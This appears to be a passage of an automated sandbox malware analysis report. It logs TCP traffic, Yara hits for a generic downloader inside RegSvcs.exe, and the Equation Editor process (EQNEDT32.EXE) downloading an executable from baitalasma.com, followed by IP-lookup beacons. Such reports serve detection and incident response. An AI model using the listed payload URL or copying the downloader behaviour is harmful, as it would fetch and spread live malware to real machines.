Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 38.242.255.115:443 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 38.242.255.115:443

Networking

Yara detected Generic Downloader

Source: Yara match	File source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.org

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 104.21.67.152 104.21.67.152
Source: Joe Sandbox View	IP Address: 158.101.44.242 158.101.44.242

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: NATIXISUS NATIXISUS

JA3 SSL client fingerprint seen in connection with other malware

Source: Joe Sandbox View	JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View	JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b

May check the online IP address of the machine

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	DNS query: name: checkip.dyndns.org

Uses a known web browser user agent for HTTP communication

Source: global traffic	HTTP traffic detected: GET /T76434567000.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: baitalasma.com
Source: global traffic	HTTP traffic detected: GET /T76434567000.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: baitalasma.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown	HTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 104.21.67.152:443 -> 192.168.2.22:49169 version: TLS 1.0

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Code function: 2_2_035306AA URLDownloadToFileW,

2_2_035306AA

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\T76434567000[1].htm

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /T76434567000.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: baitalasma.com
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/81.181.54.104 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /T76434567000.exe HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: baitalasma.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org

String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)

Source: global traffic	DNS traffic detected: DNS query: baitalasma.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org

Source: EQNEDT32.EXE, 00000002.00000002.526524695.000000000053F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://baitalasma.com/T76434567000.exe
Source: EQNEDT32.EXE, 00000002.00000002.526615840.0000000003530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://baitalasma.com/T76434567000.exej
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: RegSvcs.exe, 00000009.00000002.887723750.0000000002479000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002424000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.0000000002436000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002507000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000259A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.00000000024FB000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.000000000254A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: RegSvcs.exe, 00000009.00000002.887544334.0000000000922000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887723750.000000000239A000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000009.00000002.887544334.0000000000938000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887524692.00000000005E7000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.888289461.0000000005A58000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000C.00000002.887712847.0000000002462000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
